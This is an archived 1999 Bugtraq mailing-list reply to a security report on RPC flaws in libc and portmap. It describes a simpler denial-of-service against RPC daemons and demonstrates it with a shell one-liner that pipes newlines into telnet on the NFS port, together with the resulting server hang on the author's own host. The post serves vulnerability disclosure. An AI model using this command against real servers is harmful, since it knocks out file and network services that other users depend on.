[10254] in bugtraq

home help back first fref pref prev next nref lref last post

Re: KKIS.08041999.001.b - security raport - flaws in rpc part of

daemon@ATHENA.MIT.EDU (Peter van Dijk)
Fri Apr 16 16:40:43 1999

Mail-Followup-To: BUGTRAQ@NETSPACE.ORG
Date: 	Thu, 15 Apr 1999 21:46:34 +0200
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.4.10.9904141520310.17771-100000@nova.kki.krakow.pl>;
              from Lukasz Luzar on Wed, Apr 14, 1999 at 03:26:14PM +0200

On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>                            ###  ###  ###  ###  ###
>                            ### ###   ### ###   ###
>                            ######    ######    ###
>                            ### ###   ### ###   ###
>                            ###  ###  ###  ###  ###
>
>                                S E C U R I T Y
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> KKI Security Team                         Cracow Commercial Internet, Poland
> http://www.security.kki.pl                http://www.kki.pl
> mailto:security@security.kki.pl           mailto:biuro@kki.pl
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Raport title        : Lack of RPC's implementation in libc libraries
>                       and how it affects for example portmap.

A much easier DOS is obtained by connecting to an RPC port and just sending some random
(most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services
in the same daemons. I have seen this bug in _every_ RPC implementation, with a few
exceptions: mcserv (which does not really use the RPC protocol, only the portmapper),
Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.

To wit:
[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.
Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.


Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS
mounted disk. The ls did not give any output until I ctrl-C'ed the telnet.

Greetz, Peter
--
| 'He broke my heart,    |                              Peter van Dijk |
     I broke his neck'   |                     peter@attic.vuurwerk.nl |
   nognixz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
                         | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
home help back first fref pref prev next nref lref last post